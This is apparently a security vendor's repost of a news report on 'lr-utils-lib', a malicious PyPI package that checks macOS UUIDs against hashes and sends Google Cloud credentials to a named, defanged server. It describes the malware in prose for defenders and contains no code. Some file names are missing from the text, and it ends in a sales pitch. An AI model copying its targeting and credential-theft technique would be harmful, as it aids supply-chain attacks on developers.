Cybersecurity researchers have discovered a malicious package on the Python Package Index (PyPI) repository that targets Apple macOS systems with the goal of stealing users' Google Cloud credentials from a narrow pool of victims. The package, named "lr-utils-lib," attracted a total of 59 downloads before it was taken down. It was uploaded to the registry in early June 2024.
Key Takeaways
Malicious PyPI package named "lr-utils-lib" targets macOS systems.
The package aims to steal Google Cloud credentials.
It was downloaded 59 times before removal.
The malware uses predefined hashes to target specific macOS machines.
Captured credentials are sent to a remote server.
Discovery and Functionality
Checkmarx researcher Yehuda Gelb reported that the malware first checks if it has been installed on a macOS system. It then compares the system's Universally Unique Identifier (UUID) against a hard-coded list of 64 hashes. If the compromised machine is among those specified, it attempts to access two files, namely and , located in the directory, which contain Google Cloud authentication data.
Data Transmission
The captured information is transmitted over HTTP to a remote server "europe-west2-workload-422915[.]cloudfunctions[.]net." This indicates a sophisticated level of planning and execution by the threat actors.
Social Engineering Element
Checkmarx also found a fake profile on LinkedIn with the name "Lucid Zenith" that matched the package's owner and falsely claimed to be the CEO of Apex Companies. This suggests a possible social engineering element to the attack.
Previous Incidents
This incident comes more than two months after cybersecurity firm Phylum disclosed details of another supply chain attack involving a Python package called "requests-darwin-lite" that was also found to unleash its malicious actions after checking the UUID of the macOS host. These campaigns indicate that threat actors have prior knowledge of the macOS systems they want to infiltrate and are going to great lengths to ensure that the malicious packages are distributed only to those particular machines.
Impact on Enterprises
"While it is not clear whether this attack targeted individuals or enterprises, these kinds of attacks can significantly impact enterprises," Gelb said. "While the initial compromise usually occurs on an individual developer's machine, the implications for enterprises can be substantial."
The discovery of the "lr-utils-lib" package highlights the ongoing risks associated with supply chain attacks and the need for heightened vigilance among developers and enterprises. As threat actors continue to evolve their tactics, it is crucial to implement robust security measures to protect sensitive information. Learn how the team at Betterworld Technology can help protect you from cyber-threats by booking a consultation with our experts now, together we can find the best solutions and systems to implement and help your organization run smoothly and efficiently.
Sources
Malicious PyPI Package Targets macOS to Steal Google Cloud Credentials, The Hacker News.